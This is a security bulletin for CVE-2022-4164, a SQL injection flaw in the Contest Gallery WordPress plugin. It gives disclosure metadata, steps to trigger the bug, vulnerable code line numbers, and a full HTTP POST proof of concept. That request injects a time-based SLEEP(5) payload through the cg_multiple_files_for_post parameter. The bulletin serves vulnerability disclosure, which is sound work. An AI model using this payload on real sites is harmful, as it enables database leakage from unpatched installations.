Headline
CVE-2022-4164: Security Bulletin
The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the cg_multiple_files_for_post POST parameter before concatenating it to an SQL query in 0_change-gallery.php. This may allow malicious users with at least author privilege to leak sensitive information from the site’s database.
contest-gallery 19.1.4.1 (11/15) WordPress plug-in SQL injection****Vulnerability Metadata
Key
Value
Date of Disclosure
December 05 2022
Affected Software
contest-gallery
Affected Software Type
WordPress plugin
Version
19.1.4.1
Weakness
SQL Injection
CWE ID
CWE-89
CVE ID
CVE-2022-4164
CVSS 3.x Base Score
x
CVSS 2.0 Base Score
x
Reporter
Kunal Sharma, Daniel Krohmer
Reporter Contact
Link to Affected Software
https://wordpress.org/plugins/contest-gallery/
Link to Vulnerability DB
https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4164
Vulnerability Description
The cg_multiple_files_for_post MULTIPART POST query parameter in contest-gallery 19.1.4.1 is vulnerable to SQL Injection. An attacker with role of Author or above may abuse the Change multiple files for post functionality in 0_change-gallery.php. This leads to a threat actor crafting malicious POST request.
Exploitation Guide
Note: In some cases, the line number mentioned in description text above the image can be different from the image shown below it. This change is due to lines of code wrapping, which is done to represent long lines of code in the image. The description text represents the actual line number in the application.
Create a New Gallery, if no gallery was created before.
Change the Gallery name.
Click on Edit gallery.
Click Add files and upload an image/allowed files.
Once it’s uploaded, click on Change/Save data.
Clicking Change/Save data triggers the vulnerable request.
The request needs to be modified by adding MULTIPART POST parameter cg_multiple_files_for_post[1].
A POC may look like the following request:
In the application code, the vulnerability is triggered by un-sanitized user input of cg_multiple_files_for_post[] at line 414 in ./v10/v10-admin/gallery/change-gallery/0_change-gallery.php. Furthermore, json_decode function call is made on parameter value.
At line 474 in ./v10/v10-admin/gallery/change-gallery/0_change-gallery.php the vulnerable input is again passed to variable- $queryHasRealIdDeleted.
At line 515 in ./v10/v10-admin/gallery/change-gallery/0_change-gallery.php multiple database query call on $querySETrowDeactivate leads to SQL Injection.
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.
The SQL injection can be triggered by sending the request below:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------284630601713051351302083313615
Content-Length: 2082
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7Ce93774011f8915e8d1b69955e8c50a905c9040c9c17efcca7b42f24fb32f43e2; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7C2bc19f40221c8d9c3d9219517701a229fe9080215045fe6a050c6d9b594282b3; wp-settings-time-5=1668392508; wp-settings-5=libraryContent%3Dupload
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgGalleryFormSubmit"
1
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="action"
post_cg_gallery_view_control_backend
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgGalleryHash"
355b5e0384230f74e41bc47f47d94aef
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_id"
1
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_star
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_multiple_files_for_post[1]"
[{"id":"' ELSE MultipleFiles END WHERE (id) IN ((1)) and SLEEP(5);#"}]
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_step"
10
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_order"
custom
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgVersionScripts"
19.1.4.1
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_search"
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_email[1]"
[email protected]
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cg_image_name[1]"
10x-featured-social-media-image-size
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="chooseAction1"
1
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgBackendHash"
e12e8782da8ac6c4f1725d81a9811524
-----------------------------284630601713051351302083313615
Content-Disposition: form-data; name="cgIsRealFormSubmit"
true
-----------------------------284630601713051351302083313615--